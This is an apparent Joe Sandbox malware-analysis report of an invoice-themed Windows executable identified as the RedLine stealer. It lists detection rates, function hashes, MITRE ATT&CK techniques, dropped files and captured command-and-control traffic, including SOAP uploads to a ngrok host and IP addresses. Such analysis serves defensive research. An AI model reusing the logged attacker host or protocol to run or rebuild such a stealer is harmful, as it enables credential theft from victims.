Opcode ID: e59006e6f3a900f9926a7c46dc3eb3e5e245dbe19dfe44431d0c0dd54168088a
Instruction ID: bd63626fae5092084db1b329601d4884293d5791e64e85f27d091ae315d0a198
Opcode Fuzzy Hash: e59006e6f3a900f9926a7c46dc3eb3e5e245dbe19dfe44431d0c0dd54168088a
Instruction Fuzzy Hash: 2B1190B5908680CFDB16CF54E5C4B19FB61FB84224F28C6AAD8484B646C37AD44ACFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0110D46F Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.451667039.000000000110D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0110D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_110d000_P90GT_Invoice_Related_Property_Tax_P800.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c7476f9ef67022c6f40ab1799bec6ea3099b5a12b22541a18a444746aa0498e5
Instruction ID: 9e9768a338954b87cbb16c45cac26fd89df7b9ade3d30aa06f34ffc99704be40
Opcode Fuzzy Hash: c7476f9ef67022c6f40ab1799bec6ea3099b5a12b22541a18a444746aa0498e5
Instruction Fuzzy Hash: 0611BE75904280CFCF06CF54D5C0B15BB71FB85218F24C6A9DC494B696C37AD44ACB52

Uniqueness

Uniqueness Score: -1.00%

Function 010FDA69 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.451519277.00000000010FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010FD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_10fd000_P90GT_Invoice_Related_Property_Tax_P800.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ef0bc198ea6513377dbfdbbc04a7bee72d82b992487c86b91fde911822fb965
Instruction ID: c51b3a2e620655ca8c6975e95565a4fab2d7d56621364124edf929aaa51ebf67
Opcode Fuzzy Hash: 9ef0bc198ea6513377dbfdbbc04a7bee72d82b992487c86b91fde911822fb965
Instruction Fuzzy Hash: 0B01F77140C3449AE7209FA9CC81767BBD8EF41278F18859EFF445AA46C3799848C775

Uniqueness

Uniqueness Score: -1.00%

Function 010FDA68 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.451519277.00000000010FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010FD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_10fd000_P90GT_Invoice_Related_Property_Tax_P800.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 810913408a31d0903030988c7f5a20a897ab6e71e1c5fd869fe12af1b3370e78
Instruction ID: 661a5930d01d462c901dd11da455225c666ae0775d9f9051fbcb0c18ef8788a4
Opcode Fuzzy Hash: 810913408a31d0903030988c7f5a20a897ab6e71e1c5fd869fe12af1b3370e78
Instruction Fuzzy Hash: 8EF062714082849AE7518E5ADC84B62FFD8EF41674F18C49EEE485B686C3799848CBB1

Uniqueness

Uniqueness Score: -1.00%

Source: global traffic	TCP traffic: 18.192.93.86 ports 17685,1,5,6,7,8
Source: global traffic	TCP traffic: 18.197.239.5 ports 17685,1,5,6,7,8

Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 2.tcp.eu.ngrok.io:17685Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"Host: 2.tcp.eu.ngrok.io:17685Content-Length: 144Expect: 100-continueAccept-Encoding: gzip, deflate
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"Host: 2.tcp.eu.ngrok.io:17685Content-Length: 1156830Expect: 100-continueAccept-Encoding: gzip, deflate
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"Host: 2.tcp.eu.ngrok.io:17685Content-Length: 1156822Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 18.192.93.86 18.192.93.86
Source: Joe Sandbox View	IP Address: 18.197.239.5 18.197.239.5

Source: global traffic	TCP traffic: 192.168.2.3:49729 -> 18.197.239.5:17685
Source: global traffic	TCP traffic: 192.168.2.3:49741 -> 18.192.93.86:17685

Source: P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.455903460.00000000030B4000.00000004.00000800.00020000.00000000.sdmp, P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.456660518.00000000033A0000.00000004.00000800.00020000.00000000.sdmp, P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.456563113.0000000003307000.00000004.00000800.00020000.00000000.sdmp, P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.456354168.000000000326E000.00000004.00000800.00020000.00000000.sdmp, P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.456139789.00000000031D5000.00000004.00000800.00020000.00000000.sdmp, P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.456056972.000000000313E000.00000004.00000800.00020000.00000000.sdmp, P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.455282886.0000000003023000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: 0l9https://www.facebook.com/chat/video/videocalldownload.php equals www.facebook.com (Facebook)
Source: P90GT_Invoice_Related_Property_Tax_P800.exe, 00000001.00000002.455282886.0000000003023000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: ium PDF Plugin","versions":[{"comment":"Chromium PDF Plugin has no version information.","status":"fully_trusted","version":"0"}]},"divx-player":{"group_name_matcher":"DivX Web Player","help_url":"https://support.google.com/chrome/?p=plugin_divx","lang":"en-US","mime_types":["video/divx","video/x-matroska"],"name":"DivX Web Player","url":"http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exe","versions":[{"status":"requires_authorization","version":"1.4.3.4"}]},"facebook-video-calling":{"group_name_matcher":"Facebook Video","lang":"en-US","mime_types":["application/skypesdk-plugin"],"name":"Facebook Video Calling","url":"https://www.facebook.com/chat/video/videocalldownload.php","versions":[{"comment":"We do not track version information for the Facebook Video Calling Plugin.","status":"requires_authorization","version":"0"}]},"google-chrome-pdf":{"group_name_matcher":"Chrome PDF Viewer","mime_types":[],"name":"Chrome PDF Viewer","versions":[{"comment":"Google Chrome PDF Viewer has no version information.","status":"fully_trusted","version":"0"}]},"google-chrome-pdf-plugin":{"group_name_matcher":"Chrome PDF Plugin","mime_types":[],"name":"Chrome PDF Plugin","versions":[{"comment":"Google Chrome PDF Plugin has no version information.","status":"fully_trusted","version":"0"}]},"google-earth":{"group_name_matcher":"Google Earth","lang":"en-US","mime_types":["application/geplugin"],"name":"Google Earth","url":"http://www.google.com/earth/explore/products/plugin.html","versions":[{"comment":"We do not track version information for the Google Earth Plugin.","status":"requires_authorization","version":"0"}]},"google-talk":{"group_name_matcher":"Google Talk","mime_types":[],"name":"Google Talk","versions":[{"comment":"'Google Talk Plugin' and 'Google Talk Plugin Video Accelerator' use two completely different versioning schemes, so we can't define a minimum version.","status":"requires_authorization","version":"0"}]},"google-update":{"group_name_matcher":"Google Update","mime-types":[],"name":"Google Update","versions":[{"comment":"Google Update plugin is versioned but kept automatically up to date","status":"requires_authorization","version":"0"}]},"ibm-java-runtime-environment":{"group_name_matcher":"IBMJava*","mime_types":["application/x-java-applet","application/x-java-applet;jpi-version=1.7.0_05","application/x-java-applet;version=1.1","application/x-java-applet;version=1.1.1","application/x-java-applet;version=1.1.2","application/x-java-applet;version=1.1.3","application/x-java-applet;version=1.2","application/x-java-applet;version=1.2.1","application/x-java-applet;version=1.2.2","application/x-java-applet;version=1.3","application/x-java-applet;version=1.3.1","application/x-java-applet;version=1.4","application/x-java-applet;version=1.4.1","application/x-java-applet;version=1.4.2","application/x-java-applet;version=1.5","application/x-java-applet;version=1.6","application/x-java-applet;version=1.7","application/x-java

Source: P90GT_Invoice_Related_Property_Tax_P800.exe	Virustotal: Detection: 61%			Perma Link
Source: P90GT_Invoice_Related_Property_Tax_P800.exe	ReversingLabs: Detection: 80%

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report P90GT_Invoice_Related_Property_Tax_P800.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: RedLine

Yara Signatures

Initial Sample

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\P90GT_Invoice_Related_Property_Tax_P800.exe.log

C:\Users\user\AppData\Local\Temp\tmp2A94.tmp

C:\Users\user\AppData\Local\Temp\tmp3162.tmp

C:\Users\user\AppData\Local\Temp\tmp32B5.tmp

C:\Users\user\AppData\Local\Temp\tmp3534.tmp

C:\Users\user\AppData\Local\Temp\tmp35CE.tmp

C:\Users\user\AppData\Local\Temp\tmp4258.tmp

C:\Users\user\AppData\Local\Temp\tmp5787.tmp

C:\Users\user\AppData\Local\Temp\tmp65E.tmp

C:\Users\user\AppData\Local\Temp\tmp66C6.tmp

C:\Users\user\AppData\Local\Temp\tmp696B.tmp

C:\Users\user\AppData\Local\Temp\tmp6F19.tmp

C:\Users\user\AppData\Local\Temp\tmp72A.tmp

C:\Users\user\AppData\Local\Temp\tmp7923.tmp

C:\Users\user\AppData\Local\Temp\tmp79AB.tmp

C:\Users\user\AppData\Local\Temp\tmp7F6.tmp

Windows Analysis Report
P90GT_Invoice_Related_Property_Tax_P800.exe

Function 00E34410 Relevance: 24.1, APIs: 1, Strings: 11, Instructions: 3086
libraryCOMMON

Function 00E30460 Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 429
memoryCOMMON

Function 00E3E928 Relevance: 2.1, Strings: 1, Instructions: 881
COMMON

Function 00E38318 Relevance: 1.8, Strings: 1, Instructions: 540
COMMON

Function 00E3A144 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 46
COMMON

Function 00E3E595 Relevance: 1.7, APIs: 1, Instructions: 248
processCOMMON